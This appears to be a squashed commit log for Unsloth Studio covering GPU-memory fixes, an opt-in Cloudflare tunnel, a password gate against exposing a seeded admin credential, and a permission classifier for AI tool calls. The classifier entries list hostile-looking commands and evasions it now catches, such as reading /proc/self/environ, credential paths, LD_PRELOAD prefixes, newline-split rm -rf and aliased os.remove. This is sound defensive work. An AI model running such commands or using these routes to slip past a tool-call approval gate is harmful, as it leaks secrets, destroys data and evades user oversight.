* Studio: address PR review (fix GPU-info hydration race, share fit context-length across load paths)
* Studio: address codex review (manual single-GPU TP guard, GPU-aware spec defaults in fit/manual, GGUF-only context/preference)
* Studio: address codex review round 2 (gpu_present seed, single-GPU tensor-split guard, staged manual-knob reset, strip inherited offload flags)
* Studio: address codex review round 3 (strip inherited --n-cpu-moe, CPU-fallback warning in Manual mode)
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* Studio: address codex review round 4 (preserve pinned fit context across a later Apply)
* Studio: address codex review round 5 (honor GPU picker for diffusion GGUFs, clear fit pin on cross-model switch)
* Studio: preserve the pending GPU Memory mode when staging a model
* Studio: pin diffusion GPU device order and reset GPU-memory state for diffusion loads
* Studio: address codex review round 6 (fit-Auto rollback context, preserve manual non-tensor split modes, persist GPU mode on load not select)
* Studio: persist the applied GPU Memory mode, not the requested one (skip diffusion loads)
* Studio: replace Manual-mode split-ratio field with per-GPU layer sliders
* Studio: clarify per-GPU layer split hint for tensor-parallel mode
* Studio: address codex review round 7 (allow GGUF gpu_ids past the legacy guard, replay GPU-memory fields on respawn)
* Studio: address codex review round 8 (size the validate preflight like the load in fit mode, across both load paths)
* Studio: skip the training-OOM guard for llama.cpp --fit GGUF loads (they spill to RAM)
* Studio: drop the now-redundant compare-path validate sizing (the --fit guard skip makes it moot)
* Studio: address codex review round 9 (keep the training guard for fit loads, forward gpu_ids to validate, strip inherited manual tensor-split)
* Studio: address codex review round 10 (gate GPU-memory adoption on is_gguf, record manual knobs only in Manual mode)
* Studio: handle diffusion GGUFs symmetrically in the GPU Memory controls (preserve the standing mode preference, hide the inapplicable mode/TP controls)
* Studio: remember the GPU Memory settings per model
* Studio: consolidate --fit mode and Manual mode into a single Manual mode
* Studio: preserve the per-GPU layer split across GPU Layers changes
* Studio: trim overly long GPU Memory comments
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* address GPU memory config review comments
* trim redundant GPU memory tests
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* Reconcile manual-mode TP drops with the #6659 drop-site invariants
* Preserve quantized KV in manual --fit, charge GGUF companions in full, reconcile GPU pick on load
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The diffusion runner drives only its single lowest device and the backend
records that one device (self._gpu_ids = [sorted(gpu_ids)[0]]), but the reload
dedupe compared it against the full requested list, so a multi-GPU pick that
resolves to the same device forced a needless reload. Normalize the request the
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route _request_matches_loaded_settings.
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instead of falsely blocking the load, and an empty token (a CPU-only runner such
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so a load could pass on capacity it cannot use and then OOM active training.
Size against the worst-case visible device (min free) instead, keeping the
guard's documented default-deny contract. The empty-token (CPU-only runner)
allow path is unchanged.
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False alongside the other placement resets. A prior tensor-parallel chat load
(process killed but not fully unload-reset) otherwise left /status misreporting
tensor parallelism and made an identical diffusion re-Apply reload against the
stale state.
- tensor_split: reject negative / non-finite / all-zero splits up front. They
were dropped at launch but still compared raw in the reload dedupe, so an
identical Apply reloaded indefinitely.
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* Replace standalone Studio wording with Unsloth
Replace the single word Studio with Unsloth wherever it is used as
shorthand for Unsloth Studio in docs, CLI output, UI strings, i18n
locales, workflow display names, comments and docstrings.
Kept unchanged: the full name Unsloth Studio, third party product
names (LM Studio, Visual Studio, Mac Studio), feature names
(Recipe Studio, Fine-tuning Studio and its translations), and all
identifiers such as env vars, commands, paths and filenames.
* Address review feedback on the Studio wording rename
Use "an" before Unsloth where the rename left the article as "a".
Restore the split brand where Unsloth and Studio render as two halves
of the full product name: the onboarding sidebar subtitle and the
IPv6 localhost warning. Scope two messages to the full name Unsloth
Studio where plain Unsloth was misleading: the AMD README bullet and
the CLI studio setup error.
Two live-test findings on the video progress endpoints:
- load-progress downloaded_bytes froze mid-download: the counter used
scan_cache_dir, which skips in-flight *.incomplete blobs, so it sat at the
last completed blob for the whole multi-GB shard pull while the disk kept
filling. Count the repo's cache directory directly (completed plus incomplete
blobs, snapshot symlinks skipped so nothing is double-counted).
- generate-progress reported total_steps=null / fraction=0 while step advanced:
the video API only carried the native total field while the image API exposes
total_steps and fraction, so one poller could not work against both. Derive
the image-compatible aliases in generate_progress and declare them on the
response model; the native total stays for back-compat.
Adapters are baked at load time: they attach to the dense transformer,
then quantize_ converts only the frozen base linears (the lora_ side
path is excluded by name), then the loader compiles. Post-quant PEFT
injection is not possible on a manually quantized module, so the
prequant shortcut is skipped for a baked load and the memory plan is
sized for the dense build (force_dense on the quant candidate).
At generation time the baked topology is frozen: weight tweaks and
disabling (scale 0 reproduces the quantized base exactly) go through
set_adapters, while adding or removing adapters returns a clean 400
telling the client to reload with the new selection.
supports_lora now returns True for int8/fp8 diffusers loads (checked
before the gguf-kind early return, since the quant fast path keeps the
picker kind); nvfp4/mxfp8 and GGUF-via-diffusers stay blocked. The
load request model takes an optional loras list, threaded through
begin_load on both engines (native ignores it and keeps applying LoRA
at generation).
Verified end to end on GPU: Z-Image GGUF picker + int8 + trained
adapter loads through the API, bake marker logged, weight 1.0 vs 0
renders differ visibly, weight 0.5 accepted live, unknown adapter
rejected as 400. Affected suites: 296 passed.
* Studio: make the Cloudflare tunnel opt-in (off by default)
A wildcard bind (`-H 0.0.0.0`) auto-started a public trycloudflare.com
tunnel, so exposing Studio on the LAN also published it to the public
internet. Flip the default so the tunnel is opt-in.
- `--cloudflare` is now tri-state (Optional[bool], default None = off),
mirroring the existing --enable-tools/--disable-tools handling. Pass
--cloudflare to expose a public HTTPS link for a wildcard bind; --secure
still implies the tunnel.
- --secure + --no-cloudflare is still rejected as a contradiction.
- Update the parent-command guard, re-exec forwarding, startup-banner
wording, the colab comment, README, and tests.
* Studio: update installer/setup launch hints for opt-in Cloudflare
The post-install launch hints only mentioned --secure for a public link.
Now that the tunnel is opt-in, clarify that -H 0.0.0.0 exposes the raw
port on the LAN (not a public URL), and surface --cloudflare as the
explicit opt-in for a public HTTPS link (--secure keeps the raw port
private). Applied to install.ps1, install.sh, and studio/setup.sh.
* Studio: address review - keep cloudflare tri-state + harden run re-exec
Two review points from the bots:
- Gemini: keep `cloudflare` as Optional[bool] in run_server instead of
casting None -> False, so the startup banner can distinguish "OFF (default)"
(unset) from "OFF (--no-cloudflare)" (explicit). `_cloudflare_flag` and the
banner branch now carry the tri-state.
- Codex (P1): `unsloth studio run` re-execs the studio venv's console script,
which can be an older build whose --cloudflare defaulted on; omitting the
flag let it re-enable the tunnel. That path now forwards the default polarity
explicitly (--no-cloudflare, or nothing under --secure since --secure implies
the tunnel). The plain `unsloth studio` path runs the same-version in-tree
run.py (resolved via _find_run_py), so it keeps forwarding only an explicit
polarity and still shows the accurate "(default)" banner.
Tests updated for the tri-state banner labels, the None gate cases, and the
new re-exec forwarding.
* Studio: forward --no-cloudflare on plain re-exec too (mixed install)
Codex follow-up: _find_run_py falls back to STUDIO_HOME/.../studio/backend/
run.py when the package copy is absent, so the plain `unsloth studio` re-exec
can land on an older run.py whose --cloudflare defaults on. Forward the default
polarity explicitly there too (--no-cloudflare, or nothing under --secure),
matching the run subcommand. The common in-venv launch skips the re-exec and
still shows the tri-state "(default)" banner.
* Studio: fix launch hint - --cloudflare needs the wildcard bind
Codex P3: the launch hint listed --cloudflare next to the loopback
`unsloth studio -p 8888` command, but the tunnel only starts for wildcard
binds, so `--cloudflare` alone on 127.0.0.1 does nothing. Show
`-H 0.0.0.0 --cloudflare` in the hints (install.ps1, install.sh,
studio/setup.sh) and clarify the same in the README.
* Studio: cross-platform masked terminal password prompt helper
Per-keystroke '*' echo (POSIX termios cbreak / Windows msvcrt.getwch),
backspace editing, Ctrl-C abort, EOF handling, confirmation loop with
re-prompt on mismatch or policy failure. Pure should_prompt gate for the
--secure/--cloudflare exposure paths.
* Studio CLI: force a terminal password change before public tunnel exposure
When a launch will start the Cloudflare tunnel (--secure, or --cloudflare on
a non-api-only wildcard bind) and the admin account still has its seeded
bootstrap password, prompt for a new password in the terminal (masked with
'*', confirmed, re-prompting until valid) before any re-exec or server
exists. The change is committed in the parent so it never crosses argv or
the environment and older studio-venv children see it immediately. Without
a terminal, warn and fall back to the backend bootstrap shutdown timer.
Mirrors backend update_password semantics in one transaction: rehash,
rotate the JWT secret, clear must_change_password, revoke refresh tokens,
drop the desktop secret, then remove the stale credential files.
* Studio: terminal password gate before the public tunnel (backend backstop)
Never publish a trycloudflare URL while the seeded admin password is
active: run_server now runs a terminal password-change gate after the
tunnel decision and strictly before start_studio_tunnel. Interactive
refusal fails closed (shutdown + exit 1, mirroring the secure gate);
without a tty it warns and keeps the bootstrap deadline. Success applies
the same effects as the change-password route (update_password +
revoke_user_refresh_tokens) and drops the stale
app.state.bootstrap_password. MIN_PASSWORD_LENGTH centralised in
auth/storage.py and referenced by the HTTP schema. terminal_prompt.py
carries the pure gate helper (interactive loop stubbed; supplied by the
masked-input module). Also migrates the studio/setup.ps1 launch footer
that still showed the bare wildcard hint.
* README: reconcile remote-access section with opt-in Cloudflare tunnel
* Studio: harden the terminal password gate after review
- run.py: run the gate BEFORE the uvicorn socket binds. On a wildcard
--cloudflare launch the served HTML injects the bootstrap credential
for first login, so a pre-gate listener would hand the default
password to anyone who reaches the raw port while the operator is
still typing. The gate now also seeds the admin row itself (it can
run before lifespan startup).
- Headless launches that nothing would protect now fail closed: the
bootstrap deadline never arms for api-only serving and
UNSLOTH_STUDIO_BOOTSTRAP_TIMEOUT=0 disables it, so warn-and-proceed
would have promised a shutdown that never comes. Both the CLI and the
backend refuse to publish in that case; the ordinary headless path
still warns and relies on the 1h deadline, and no longer auto-fills
the default credential into HTML served on a public URL.
- storage.update_password gains revoke_refresh_tokens to delete the
user's refresh tokens in the SAME transaction as the password commit;
the change-password route and the backend gate use it (a separable
follow-up delete could fail after the commit and leave a stale
refresh token able to mint access tokens under the rotated secret).
- clear_bootstrap_password is best-effort: a locked/undeletable file
must not surface as a failed password change.
- CLI masked reader: disable ISIG like the backend so Ctrl-Z cannot
suspend the process with the shared terminal stuck in no-echo mode;
handle Ctrl-C/Ctrl-Z as characters; treat stream EOF mid-line as an
abort instead of submitting a partial password. Both readers restore
terminal attrs from a SIGTERM/SIGHUP handler since a finally block
cannot run when a default-disposition signal terminates the process.
- Backend reader: decode byte-at-a-time through an incremental UTF-8
decoder so multi-byte characters split across read boundaries are no
longer dropped; isatty checks tolerate closed/None streams.
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* Studio: persist bootstrap suppression through lifespan startup
The pre-bind password gate nulled app.state.bootstrap_password, but the
FastAPI lifespan runs after it and re-reads the bootstrap password into
app.state on both admin paths, so a headless public launch could still
serve the injected credential in HTML. Carry a persistent
suppress_bootstrap_injection flag that the lifespan honors instead.
Also drop the quoted Tuple annotation on _terminal_password_gate that
tripped the import-hoist lint (the typing import looked unused).
* Studio CLI: keep the pre-exec auth DB private (0700 dir, 0600 db)
On a fresh install the pre-exposure password gate creates auth/ and
auth.db through the CLI before the backend ever runs, and
sqlite3.connect leaves the DB 0644 under a 022 umask. Mirror backend
storage.get_connection's chmod so the committed password hash and JWT
secret are never world-readable, even if the launch aborts before the
backend applies its own modes.
* Tighten pre-exposure password gate comments
* Studio: delete seeded bootstrap password before headless public re-exec
The headless warn-and-proceed path returns with the default admin
password still active, then re-execs a child Studio process. An old
studio-venv child (mixed-version install) predates the pre-bind gate and
its injection-suppress flag, so its lifespan reads .bootstrap_password
and injects the seeded credential into the public HTML for up to the
bootstrap deadline. A CLI-flag handshake cannot fix this uniformly: the
studio run path uses ignore_unknown_options and an old in-venv child
runs in-process, so it would never reject the flag.
Delete the seeded .bootstrap_password file in the parent before re-exec
so a fresh child of any version reads None and never serves it. This
covers both re-exec paths and both child versions. must_change_password
stays set, so the login page still forces a change and the bootstrap
shutdown timer still arms; only the plaintext-on-disk copy is removed.
Recovery is via a terminal-attached run or reset-password. Backend gate
and CLI warnings updated to match.
* Studio: commit the seeded admin before headless public re-exec
The headless-warn path deletes the seeded .bootstrap_password so a
re-exec'd child cannot inject it, but _ensure_cli_default_admin's INSERT
was never committed and rolled back on conn.close(). On a fresh
STUDIO_HOME an old studio-venv child then found no admin, regenerated a
fresh bootstrap password + file, and injected THAT into the public page,
defeating the deletion.
Commit the seeded admin right after _ensure_cli_default_admin so any
re-exec'd child sees the existing account and does not regenerate.
Regression tests cover both re-exec paths on a fresh (unseeded) DB.
* Studio: fail closed when the bootstrap password file cannot be removed
On the headless public path, deleting .bootstrap_password is the
protection against an old re-exec'd child injecting the seeded
credential. If unlink fails (locked file, read-only auth dir) the file
is still on disk, so warning and proceeding would still leak it for the
bootstrap-timeout window. Abort with a clear error instead. Regression
test covers the unlink-failure fail-closed path.
* Studio: hold no-echo for the whole password line, not per keystroke
The POSIX masked reader set cbreak/no-echo inside _getch_posix and restored
the terminal to echo-on in a finally after every single keystroke, because
_read_password calls _getch once per character. Between one char returning and
the next call re-entering cbreak, ECHO was on, so a keystroke arriving in that
window echoed the password in cleartext.
Move the terminal mode into a _prompt_raw_mode context that _read_password
holds around the entire line (mirroring unsloth_cli/commands/_password_prompt.py,
which already did this), restoring once when the line completes or aborts.
_getch_posix now only reads, since the mode is held by the caller. The context
is a no-op when stdin is not a real terminal, keeping the _getch test seam.
Add a regression test asserting the raw-mode context wraps the read exactly
once and every keystroke is read while it is active.
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* Studio: strip the seeded bootstrap password when the auth DB check fails
The pre-exposure gate returned early on two auth-DB inspection failures and
proceeded to re-exec without removing the seeded .bootstrap_password:
- _connect_auth_db() failure: a seeded credential from a prior run may still
be on disk.
- the must_change_password read-back failure: worse, _ensure_cli_default_admin
had already seeded the admin and the code committed it (writing
.bootstrap_password) right before the failing SELECT.
In the mixed-version case (a new outer CLI re-execing an old studio-venv child
that predates the pre-bind gate), that child would read the file back and
inject the default admin credential into the public Cloudflare page. The
sibling headless branch already deletes the file for exactly this reason, so
these returns were an inconsistent gap.
Factor the delete-or-fail-closed logic into
_strip_seeded_bootstrap_password_or_exit and call it on both inspection
failures (and reuse it in the headless branch): strip the seeded file first
(version-independent protection), failing closed if the removal itself fails.
must_change_password stays set, so the login page still forces a change and the
bootstrap shutdown timer still arms.
Add tests for both new paths (connect failure and post-commit read-back
failure strip the file and proceed; a failed strip fails closed).
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* Studio: fail closed when the seeded admin cannot be committed before exposure
The pre-exposure gate wrapped _ensure_cli_default_admin (the INSERT), its
conn.commit(), and the must_change_password read-back in one try, and the
except recovered by stripping .bootstrap_password and proceeding to re-exec on
the assumption the admin was already committed. That assumption only holds when
the failing statement is the SELECT. When the INSERT or the commit itself fails
(e.g. a write lock held past the busy timeout on a fresh install), no admin row
is committed: it rolls back on conn.close(), and a re-exec'd old studio-venv
child (no pre-bind gate) then finds no admin, regenerates a fresh bootstrap
password + file, and serves that default credential on the public Cloudflare
page. Stripping the file cannot stop a regeneration.
Split the seed+commit into its own try that fails closed (refuse the public
launch, best-effort removing any half-written seed file) since we cannot prove a
committed admin; keep the separate read-back failure on the strip-and-proceed
path, where the admin is committed so an old child finds it and will not
regenerate. Add a test for the seed-commit-failure path.
* Studio: decode the CLI masked password reader with errors="replace"
The CLI reader read keystrokes with text-mode sys.stdin.read(1), which raises
UnicodeDecodeError on a pasted non-UTF-8 password (e.g. Latin-1 bytes), or under
PYTHONUTF8 yields a lone surrogate that later crashes the pbkdf2 encode -- either
aborts the launch with a traceback. The backend mirror (terminal_prompt.py)
already reads raw bytes through an incremental decoder with errors="replace".
Mirror that here: read with os.read and an incremental decoder so invalid bytes
map to U+FFFD, iterating over each emitted char (one byte can complete a
replacement plus the next char).
* Studio: resolve the child launcher before the pre-exposure gate
The gate strips the seeded .bootstrap_password on a headless public launch, and
it ran before the re-exec launchability check (studio venv / run.py / console
script present). So a headless launch with an incomplete studio setup would seed
the admin, delete the bootstrap password, then abort because the child could not
be found, leaving the admin at must_change_password=1 with no password ever
shown or injectable: locked out until `unsloth studio reset-password`.
Resolve and validate the child launcher first, in both `studio` (studio_default)
and `studio run`, and only then run the gate, so an unlaunchable setup exits
before anything is stripped. Add a regression test that a missing venv exits
without removing the seeded file.
* Studio: fail closed when the auth DB cannot be opened before exposure
The connect-failure branch of the pre-exposure gate stripped .bootstrap_password
and proceeded, on the assumption a committed admin from a prior run made an old
child find it and not regenerate. But on a fresh public launch whose
_connect_auth_db() itself fails (transient lock during the schema/seed step, or
an unwritable home), no admin is committed, so a mixed-version re-exec child that
predates the backend gate can find no user, generate a fresh bootstrap password,
and serve it on the public Cloudflare page. Stripping a file we cannot vouch for
cannot stop a regeneration.
Make this branch fail closed like the seed/commit failure path: we only continue
past the DB inspection once a committed admin is confirmed. The existing file is
left untouched so a retry (after a transient lock clears) can still prompt.
Update the connect-failure test to assert fail-closed, and give the in-venv
--secure flag test a real STUDIO_HOME with an already-changed admin so the gate
is a no-op rather than relying on a DB-open failure.
* Studio: invalidate seeded bootstrap files before deleting auth.db on reset
reset-password deleted auth.db first, then best-effort unlinked the seeded
.bootstrap_password and desktop secret. unlink() only ignores
FileNotFoundError, so a locked or read-only file (Windows AV, read-only auth
dir) survived while auth.db was gone. The next server start then re-seeded
from that stale plaintext and re-validated the exact credential the reset was
meant to revoke.
Invalidate the credential files first, truncating any that cannot be
unlinked, then delete the DB, so a surviving file can never carry a reusable
secret. clear_bootstrap_password now truncates on unlink failure for the same
reason, and its warning says the contents were cleared rather than claiming
the stale password is already invalid.
* Studio: require a servable frontend before the pre-exposure gate can strip the seeded password
A headless public launch strips the seeded .bootstrap_password before the
re-exec'd child starts. If the child then cannot serve the login page (the only
in-band way to change the seeded password) the admin is locked out
(must_change_password=1, no file, no UI) until reset-password.
Add _require_servable_frontend_or_exit and call it before the gate on both
`unsloth studio` and `unsloth studio run` public launches: fail closed if a
non-api-only public launch has no built frontend dist, before anything is
stripped. A user-supplied --frontend is validated to contain index.html so a
bad path cannot silently bypass the check; an auto-resolved dist is trusted
(_find_frontend_dist already requires index.html) and forwarded to the child.
Model-load aborts on `studio run` remain a residual: the parent must strip for
mixed-version safety (an old studio-venv child has no pre-bind gate) and model
loadability cannot be proven before exec, so that path stays recoverable via
reset-password.
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* Studio: harden reset-password ordering and validate the in-venv backend before the strip
Three follow-ups to the pre-exposure hardening:
reset-password now deletes auth.db FIRST and proves it is gone before touching
the seeded credential files. If the DB cannot be removed (a running Studio or
Windows holds it open, or a read-only auth dir) it aborts with the credential
files untouched, so a forgotten-password reset is not left half-done with the
recovery credentials deleted while an un-resettable must_change_password=1 DB
survives. After the DB is gone it invalidates the stale credential files
(unlink, else truncate) and fails closed if a file can be neither removed nor
truncated, since a surviving plaintext would be re-seeded by
generate_bootstrap_password() and re-validate the revoked password.
The in-venv (in-process) launch path had no analogue of the re-exec launcher
check: a headless public launch would seed the admin and strip the seeded
.bootstrap_password in the gate before _load_run_module() later failed on a
broken/partial venv, leaving must_change_password=1 with no password to log in.
Add _validate_inproc_backend_before_strip, called on the in-venv path (both
`unsloth studio` and `unsloth studio run`) before the gate on the headless
public path, so a broken backend fails cleanly before anything is stripped. It
is scoped to the headless path so an interactive prompt is not delayed behind a
full backend import.
* Studio: validate the frontend and tunnel before the strip on every public path
Five follow-ups closing the remaining pre-exposure-strip lockouts:
The in-venv (in-process) paths of both `unsloth studio` and `unsloth studio
run` validated the backend but not the frontend before the gate, so a headless
public launch with a missing/bad dist would strip the seeded .bootstrap_password
and then abort in run_server() during frontend setup, leaving
must_change_password=1 with no login page. Both now validate a servable frontend
before the strip (cheap check first, backend import after) and serve the
resolved dist in-process.
The `studio run` re-exec discarded the dist that satisfied the pre-strip check
and only forwarded a user-supplied --frontend. In a shadowed install where the
parent finds a built dist the child cannot, it stripped and exec'd without the
path, and the child aborted during frontend setup. It now forwards the resolved
dist, matching `unsloth studio`.
On a headless --secure launch the bind is loopback, so the Cloudflare tunnel is
the only public exposure. If cloudflared is provably unavailable (found nowhere
and undownloadable) the tunnel cannot start, so stripping the recovery
credential would just lock the user out with no public URL ever served. Add
_tunnel_binary_confirmed_unavailable and, on --secure only, refuse the launch
with the credential preserved rather than strip. Wildcard --cloudflare binds
0.0.0.0 publicly regardless of the tunnel, so it still strips; any uncertainty
(helper not loadable) also still strips, since a possible credential leak
outweighs a recoverable lockout.
clear_bootstrap_password no longer claims it cleared the file's contents when
both unlink and truncate failed; it now reports the stale password is still on
disk and asks the user to remove it manually.
* Studio: fix cloudflared probe path and skip the bootstrap strip for a self-suppressing child
Two follow-ups to the --secure pre-exposure hardening:
The cloudflared availability probe loaded cloudflare_tunnel by file path but not
its backend deps: ensure_cloudflared() -> _cache_path() lazily imports
utils.paths.storage_roots, which only resolves when studio/backend is on
sys.path. From the outer CLI it is not, so the probe saw ensure_cloudflared()
return None (cache unresolvable) and wrongly treated the tunnel as unavailable,
refusing --secure even when cloudflared was cached or downloadable. Add the
backend dir to sys.path for the probe (and remove it after) so the cache path
resolves as it will in the child.
A headless --secure launch stripped the seeded .bootstrap_password before the
child proved the tunnel could actually connect, so a cloudflared that is present
but cannot establish the tunnel (blocked connectivity, Cloudflare outage) left
must_change_password=1 with no recovery credential. But the strip is only needed
when the re-exec'd child is an OLD studio-venv backend with no pre-bind
suppression: this install's own run.py sets app.state.suppress_bootstrap_injection
before binding and never serves the seeded credential publicly. Add
_child_self_suppresses (true in-process, or when the re-exec target is this
install's own run.py by path identity) and skip the strip in that case, keeping
.bootstrap_password as a local recovery credential; the strip stays fully in
force for the studio-venv console-script path and any venv-fallback run.py, where
an old child is actually possible.
* Studio: reword the pre-exposure terminal password prompt
* Studio: warn when -H is overridden by --secure; align pre-exposure prompt wording
- --secure/--secure run: emit a Note (not an error) when -H is a non-loopback
host, since --secure forces the loopback bind and would otherwise discard -H
silently.
- Reword the pre-exposure terminal prompt to 'exposed on the public internet'
in both the backend gate and the CLI mirror.
- Align the CLI success line with the backend ("Password updated for '<user>'.").
- Tests for the new -H warning (present when overridden, absent on loopback).
* Studio: add non-interactive --password to set the initial admin password
Headless hosts (CI, containers, systemd units) have no TTY, so the forced
first-exposure password change could not be completed unattended. Add a
non-interactive way to set the INITIAL admin password before the server binds:
- --password <value>, the UNSLOTH_STUDIO_PASSWORD env var, or --password -
(read one line from stdin). Off by default; unset falls back to the normal
interactive terminal prompt / browser setup.
- Applies on any launch (public --secure/--cloudflare or a headless -H 0.0.0.0
bind), only when the account still has its seeded bootstrap password. An
already-set password is a hard error, never an override; an invalid value
(too short, or equal to the bootstrap) fails closed before bind.
- The CLI applies the change in the parent, never forwards --password to the
re-exec child, and strips UNSLOTH_STUDIO_PASSWORD from the child env so the
secret never crosses to the child. run.py does the same on the direct path and
strips the env var so spawned subprocesses (cloudflared, llama-server, tools)
cannot inherit it.
Mirrors resolve_supplied_password across the CLI and backend, documents the
option in the README (including the argv-visibility caveat), and covers all
flows (env/stdin/literal, fail-closed cases, no-forward, env-strip,
reset-password roundtrip) in the CLI, backend, and unit suites.
* Studio: truncate the stale bootstrap file when unlink fails on a CLI password change
The post-change cleanup in _cli_update_password only warned when
.bootstrap_password could not be unlinked but was still writable (locked file,
read-only auth dir), leaving the old plaintext on disk. If auth.db is later
reset or removed, generate_bootstrap_password() reads that file back and
re-validates the revoked bootstrap password. Truncate the file on unlink
failure so its stale plaintext cannot be re-seeded, mirroring the backend
clear_bootstrap_password(); the password change is already committed, so this
never rolls it back. The warning now states truthfully whether the contents
were cleared or the file must be removed manually.
* Studio: tighten comments
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Co-authored-by: Daniel Han <danielhanchen@gmail.com>
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
* Studio: permission levels for chat tool calls (Ask, Approve for me, Off, Full access)
Replace the Bypass permissions on/off toggle with a four level permission
selector, available in Settings > General (new Permissions section above
Notifications), the chat settings panel, the composer plus menu, and a new
always visible composer pill.
Levels:
- Ask for approval: every local tool call pauses for allow/deny.
- Approve for me: only calls detected as potentially unsafe pause; the
python/terminal sandbox stays on.
- Off: never pauses; sandbox stays on (previous default behavior).
- Full access: never pauses and the sandbox is disabled. Still requires
the danger confirmation and is never restored across reloads.
Backend adds permission_mode to the OpenAI compatible and Anthropic
passthrough payloads and threads it through both tool loops. Auto mode
uses a fail closed classifier in tools.py: terminal commands must be on
a read only allowlist with no redirection or substitution, python code
is AST scanned for writes, exec, process and network use, MCP tools
auto run only with read only style names. Unknown tools always ask.
Legacy bypass_permissions and confirm_tool_calls keep their exact
behavior for existing API callers.
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* Studio permissions: Off is a plain toggle below Full access
Off moves to the bottom of the level menu with a short description and
acts as the feature-off state: the composer pill is hidden entirely
while Off, and reselecting the active level toggles back to Off.
* Studio permissions: higher contrast composer pill text
The permission pill uses a foreground based grey instead of the shared
muted pill color, so it reads darker in light mode and lighter in dark
mode. Full access keeps the danger yellow.
* Studio permissions: panel dropdown layout and shorter tooltip
Chat settings panel: the Bypass permissions label sits on one line with
a full width dropdown underneath, styled like the other panel selects.
Tooltip shortened and wording uses Unsloth instead of Studio.
* Studio permissions: harden auto-mode unsafe detection
Extend the Approve for me classifier to catch write and exec paths that
slipped through:
- terminal: sort -o, tree -o, xxd -r, find -exec/-execdir/-ok/-delete
and find -fprint/-fprintf/-fls now ask; plain read-only forms still
auto-run. awk is no longer allowlisted since its program can write and
call system().
- python: from-imports of mutating names (from os import remove [as rm])
and star imports now ask.
Found by a fuzz and edge-case simulation matrix; pinned in
test_permission_mode.py.
* Studio permissions: split multi-line terminal commands in auto detection
A shell runs each line as its own command, but shlex reads newlines as
whitespace, so "ls\nrm -rf x" demoted rm to argument position and
auto-ran. Normalize newlines and CR to separators, and treat any all
separator token as a command boundary so runs of blank lines still
split. Found by the simulation matrix; pinned in tests.
* Studio permissions: address review feedback on auto-mode detection
Auto-mode (Approve for me) safety classifier hardening:
- Python: flag any reference to a mutating attribute, not only direct
calls, so indirect refs (f = os.remove; f(x)) and aliases ask. Detect
Path.open(mode) write modes and wrap the AST walk to fail closed.
- Terminal: match attached short output flags (sort -o/tmp/out) and keep
find context across grouping parens so find ( -delete ) asks.
- Both: ask before reads that escape the sandbox workdir via parent
traversal or hit credential paths (.ssh, .aws, id_rsa, .pem, etc.).
permission_mode plumbing:
- Fold permission_mode=full into bypass_permissions at the request model
so route-level confirm-gate guards see it as bypass.
- Reject ask/auto on the Anthropic Messages server-tools path, which has
no confirmation channel (mirrors the confirm_tool_calls rejection).
- Keep forced RAG autoinject in auto mode: the safe search_knowledge_base
retrieval never gates, so derive the skip from the real confirm need.
- Reset all local preferences now also clears the legacy confirm key so a
reset restores the fresh default instead of the old level.
Regression tests added for each case.
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* Studio permissions: close auto-mode classifier gaps from review round 2
Auto mode ("Approve for me") let a few mutating calls through as safe:
- os.open(...) always creates/writes a descriptor, so treat it as unsafe
even though builtin open in read mode stays safe.
- fd -x/--exec/-X/--exec-batch runs a command per match; scan for these
alongside find's -exec/-delete.
- tempfile writes artefacts and hands back writable handles, so importing
it now asks.
- Calling the result of a call (getattr(os, "remove")("x"), partials) is a
dynamic target the AST can't vet, so fail closed.
- An MCP tool whose name pairs a read verb with a mutating one
(get_or_create_issue, read_and_delete_file) no longer auto-runs on the
read prefix alone.
Also fold permission_mode="off" into confirm_tool_calls=False on both
request models so the non-stream route guard sees the disabled gate, and
drive the Confirm tool calls toggle off permission_mode="ask" so auto no
longer shows it on.
* Harden auto-mode classifier and normalize bypass to full for PR #7079
Approve for me now asks for a few cases it previously auto-ran:
- os.open via an os alias (import os as o; o.open(path, O_CREAT))
- pathlib symlink_to / hardlink_to / link_to
- importlib.import_module dynamic imports
- os.mkfifo / os.mknod / os.utime
Also fold bypass_permissions into full when a stale ask/auto permission_mode
is sent alongside it, so the Anthropic route guard no longer 400s those legacy
callers. Adds classifier and request-model regression tests.
* Close more auto-mode classifier gaps for PR #7079
Approve for me now asks for cases the review surfaced:
- builtin open aliased to a name (f = open; from builtins import open as w)
or looked up dynamically (globals()['open'])
- pickle / marshal / shelve / dill deserialization
- io.FileIO write handles
- sort --compress-program (runs an external program)
- MCP names carrying save/archive/submit/commit/push/sync/register verbs
Also refine the attribute open() write check so an explicit read mode
(ZipFile.open(name, "r")) stays auto while os.open flags still ask. Adds
test coverage for each case.
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* Close three more auto-mode gaps for PR #7079
- rg runs an arbitrary program per file via --pre / --hostname-bin, so
"Approve for me" now asks for those flags (rg is on the read-only
allowlist).
- A path-qualified command token (./ls, /tmp/cat) is an arbitrary
executable, not the trusted utility its basename matches, so it asks
before running.
- A direct /chat/completions caller that sets permission_mode ask/auto
but omits the legacy confirm_tool_calls flag now self-enables the
confirmation gate, so tools can no longer run ungated on that path.
Adds classifier and request-model tests for each case.
* Close auto-mode classifier gaps from review round 3 for PR #7079
Approve for me now asks for cases the latest pass surfaced:
- short-option clusters bundling a write flag (sort -uo out => -u -o)
- procfs reads that leak a process env/args/memory
(cat /proc/self/environ, /proc/PID/cmdline, maps)
- env-assignment prefixes that change command lookup/loading
(LD_PRELOAD=x ls, PATH=. ls, IFS=x ls); benign FOO=1 cmd stays auto
- os.open imported as a bare callable (from os import open as o)
Also drops ps from the safe terminal allowlist: its BSD environment
flags (ps auxe, ps eww) dump a parent process's unscrubbed env and
cannot be flag-parsed reliably, so ps always asks now. Adds classifier
tests for each case.
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* Close auto-mode classifier gaps from review round 4 for PR #7079
Terminal (Approve for me now asks for these):
- cd dropped from the safe allowlist: cd /; cat etc/passwd moves the
shell out of the session workdir so a later relative read escapes it
- env -C/--chdir (workdir escape) and -S/--split-string (builds a fresh
command line); wrapper flags are now checked
- /etc//passwd and /etc/./passwd normalize to /etc/passwd before the
sensitive-path scan
- a sensitive path split across an assignment and an argument
(p=/etc; cat $p/passwd) via best-effort NAME=value expansion
Python:
- builtins.exec / builtins.eval attribute calls (dynamic code execution)
- destructured open aliases (f, _ = (open, print); f('out', 'w'))
- a sensitive path composed from literals (os.path.join('/etc','passwd'),
'/etc' + '/passwd')
- ZipFile/TarFile write modes (ZipFile(name, 'w')); the reader stays auto
Adds classifier tests for each case.
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* Close auto-mode classifier gaps from review round 5 for PR #7079
Terminal (Approve for me now asks for these):
- procfs reads hidden by shell quotes (cat /proc/$PPID/enviro''n) or
